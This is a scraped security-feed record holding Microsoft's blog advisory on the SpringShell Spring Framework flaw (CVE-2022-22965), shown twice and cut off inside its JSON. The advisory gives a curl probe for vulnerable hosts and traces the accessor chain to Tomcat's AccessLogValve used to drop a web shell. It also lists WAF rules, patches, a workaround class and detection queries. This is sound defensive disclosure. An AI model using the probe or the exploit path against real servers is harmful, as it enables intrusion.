Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and have included vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against the CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. 
If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n \n // Applies to every controller; the high @Order value makes it run after other @ControllerAdvice beans.\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice {\n // Refuse to bind any property path that reaches a Class object (and through it the ClassLoader).\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder) {\n String[] abd = new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alert indicates an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempts (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to the SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts_ table includes only the device name of the affected device. This query joins the _DeviceInfo_ table to clearly connect other information such as device group, IP address, signed-in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). See the Detection and Mitigation section for details._\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now have enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See the Detection and Mitigation section for details._ \n_[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 _Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now have enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). See the Detect and protect with Azure Web Application Firewall (Azure WAF) section for details._\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. 
This blog is for customers looking for protection against exploitation of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell) and for ways to detect vulnerable installations on their network.\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve_ object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n   * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n   * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n    * Background\n      * Request mapping and request parameter binding\n      * The process of property binding\n    * The vulnerability and its exploitation\n      * Prelude: CVE-2010-1622\n      * The current exploit: CVE-2022-22965\n      * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n    * How to find vulnerable devices\n    * Enhanced protection with Azure Firewall Premium\n    * Detect and protect with Azure Web Application Firewall (Azure WAF)\n      * Global WAF with Azure Front Door\n      * Regional WAF with Azure Application Gateway\n    * Patch information and workarounds\n 5. Detections\n    * Microsoft 365 Defender\n      * Endpoint detection and response (EDR)\n      * Antivirus\n    * Hunting\n      * Microsoft 365 Defender advanced hunting queries\n      * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in the quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\nFigure 2. Screenshot from the original POC code post\n\nFigure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path to be inside Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public String handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So if, for instance, _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(String country) {\u2026} \n public void setCity(String city) {\u2026} \n public String getCountry() {\u2026} \n public String getCity() {\u2026} \n }\n\nand we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nthe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try to initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_, Spring would try to set those values in the _coordinates_ member of _location_ before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try to bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, suppose a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If _location_ has a _getX()_ accessor, call it to get the _x_ member of _location_\n 3. Use Java introspection to map all accessors and mutators in the _x_ object\n 4. If the _x_ object has a _getY()_ accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the _y_ object\n 6. 
If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_.\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor that gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve_ is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory:** The path where the access log is stored, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by HTTP requests, such as the web application\u2019s directory.\n 2. **Prefix:** The prefix of the access log file name.\n 3. **Suffix:** The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern:** A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and have included vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against the CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. 
If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n \n // Applies to every controller; the high @Order value makes it run after other @ControllerAdvice beans.\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice {\n // Refuse to bind any property path that reaches a Class object (and through it the ClassLoader).\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder) {\n String[] abd = new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alert indicates an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries\n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers exploitation over HTTP, not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempts (CVE-2022-22965) that drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to the SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts_ table includes only the device name of the affected device. This query joins the _DeviceInfo_ table to clearly connect other information such as device group, IP address, signed-in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). See the Detection and Mitigation section for details._\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now have enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See the Detection and Mitigation section for details._\n\n_[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 